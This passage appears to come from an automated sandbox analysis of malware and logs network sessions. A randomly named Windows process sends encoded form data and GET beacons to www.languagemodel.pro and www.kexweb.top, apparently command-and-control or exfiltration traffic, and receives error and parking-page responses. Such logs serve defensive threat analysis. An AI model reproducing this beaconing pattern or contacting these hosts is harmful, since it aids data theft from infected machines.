                                                                        Oct 8, 2024 16:35:09.392776966 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:09 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.4 | 50019 | 217.70.184.50 | 80 | 2844 | C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Oct 8, 2024 16:35:11.502243042 CEST | 10929 | OUT | POST /nxfn/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Origin: http://www.languagemodel.pro
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.languagemodel.pro/nxfn/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 45 6a 2f 37 35 2b 57 4e 42 59 77 42 36 46 2b 31 6e 4d 53 55 79 52 6a 2f 67 51 50 2b 68 41 66 4d 76 70 32 54 71 64 63 44 2b 6b 69 45 56 61 6d 38 73 4c 70 58 45 4e 55 59 2f 4e 56 31 6b 72 6c 65 51 55 79 59 63 6f 62 64 6c 63 70 78 63 72 4e 4e 4c 6e 59 30 41 5a 53 42 4d 4a 39 59 4b 6c 50 6f 32 4a 79 33 70 68 34 73 66 42 43 61 4f 34 42 68 2f 6c 41 2f 4f 45 51 6d 53 6f 71 75 41 59 54 77 6b 4c 39 70 42 6a 74 35 4d 4b 56 33 5a 48 76 6d 36 4f 78 35 79 71 51 37 75 50 77 76 34 57 4b [TRUNCATED]
Data Ascii: -NnllVvH=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//CsVCQPLFUwzuGh0DB0Fyle3fQXUIJoVX73pqe6oI2KR1aSX0xXpKDuG5sQXZ1NxjONMiloTdGy3W+IwLFVsZTPn2IB73zTKuVGbOPPdvuKKg+rBGBZm1slVFNXlqQai4Ej/75+WNBYwB6F+1nMSUyRj/gQP+hAfMvp2TqdcD+kiEVam8sLpXENUY/NV1krleQUyYcobdlcpxcrNNLnY0AZSBMJ9YKlPo2Jy3ph4sfBCaO4Bh/lA/OEQmSoquAYTwkL9pBjt5MKV3ZHvm6Ox5yqQ7uPwv4WK [TRUNCATED]
Oct 8, 2024 16:35:13.135819912 CEST | 713 | IN | HTTP/1.1 502 Bad Gateway
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:12 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 568
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 16:35:13.136502981 CEST | 713 | IN | HTTP/1.1 502 Bad Gateway
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:12 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 568
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 8, 2024 16:35:13.137814045 CEST | 713 | IN | HTTP/1.1 502 Bad Gateway
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:12 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 568
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 50020 | Destination IP: 217.70.184.50 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:35:14.043005943 CEST | 560 | OUT | GET /nxfn/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.languagemodel.pro
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 16:35:14.672527075 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:35:14 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Vary: Accept-Language
                                                                        Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                                        Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
Oct 8, 2024 16:35:14.672616005 CEST | 914 | IN | Data Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                                                        Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


Session ID: 17 | Source IP: 192.168.2.4 | Source Port: 50021 | Destination IP: 63.250.47.40 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:35:21.067187071 CEST | 806 | OUT | POST /3bdq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Origin: http://www.kexweb.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.kexweb.top/3bdq/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 77 74 32 35 35 2b 75 6f 49 6d 65 59 63 39 71 4d 54 6b 77 6e 35 37 55 76 76 6a 4f 42 76 67 72 7a 41 3d 3d
                                                                        Data Ascii: -NnllVvH=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2Nkxlqwt255+uoImeYc9qMTkwn57UvvjOBvgrzA==
Oct 8, 2024 16:35:21.787060976 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:21 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 50022 | Destination IP: 63.250.47.40 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:35:23.621690035 CEST | 826 | OUT | POST /3bdq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Origin: http://www.kexweb.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.kexweb.top/3bdq/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 66 6e 79 6f 71 36 4d 73 64 69 6f 45 41 6b 47 53 4a 55 34 49 61 38 67 35 57 44 31 4b 74 52 34 78 49 3d
                                                                        Data Ascii: -NnllVvH=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15fnyoq6MsdioEAkGSJU4Ia8g5WD1KtR4xI=
Oct 8, 2024 16:35:24.220685005 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Tue, 08 Oct 2024 14:35:24 GMT
                                                                        Server: Apache
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Content-Length: 389
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 50023 | Destination IP: 63.250.47.40 | Destination Port: 80 | PID: 2844 | Process: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 16:35:26.255626917 CEST | 10908 | OUT | POST /3bdq/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.kexweb.top
                                                                        Origin: http://www.kexweb.top
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.kexweb.top/3bdq/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
